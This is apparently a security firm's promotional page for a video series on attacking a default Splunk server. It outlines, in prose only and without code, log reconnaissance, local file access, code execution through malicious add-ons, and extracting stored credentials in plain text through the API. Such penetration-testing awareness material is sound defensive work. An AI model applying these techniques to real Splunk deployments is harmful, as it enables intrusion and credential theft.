Weaponizing Splunk: Attacking The Server

Attacking a default installation of the Splunk Application allows an attacker to gather intelligence about the system, as well as the the victim environment. The attacker’s aim is to gain a foothold without setting off any alarms.

“Through this Weaponizing Splunk investigation, I’ll show how a poorly defended Splunk system can allow attackers to do some serious damage to your network and organization.”
-Ryan, TBG Security‘s Director of Security Engineering


Attack Demonstration Lab Setup

Victim Server Configuration
Ubuntu 16.04
Splunk Server 6.5.3

Penetration Testing System Configuration
Kali Linux Rolling


Attack Missions on Splunk Server (Videos)

Cyberattack Video: Reviewing The Logs
Accessing the logs can provide an attacker with valuable intelligence about the victim environment. This information could allow an unauthorized person to build a very detailed attack profile.

Cyberattack Video: Get Local File Access
Accessing the operating system files can provide an attacker with credentials, confidential information, password hashes, or other very private information. This information could allow an unauthorized person to gain privileged access into the victim environment.

Weaponizing Splunk Malicious Apps

Cyberattack Video: Malicious Applications
Running malicious or unauthorized Splunk “add-ons” allows an attacker to execute code on a Splunk server. This can allow them to fully compromise the server and gain that initial foothold into the victim environment.

Weaponizing Splunk Extract Data

Cyberattack Video: Extract Data
Splunk stores credentials and other vital confidential information within its configuration files. This information is stored securely in an encrypted format, but using Splunk and its API, it is possible for an attacker to extract data in plain-text.


Get In Touch

Have a question? We’re here to help.

Contact Us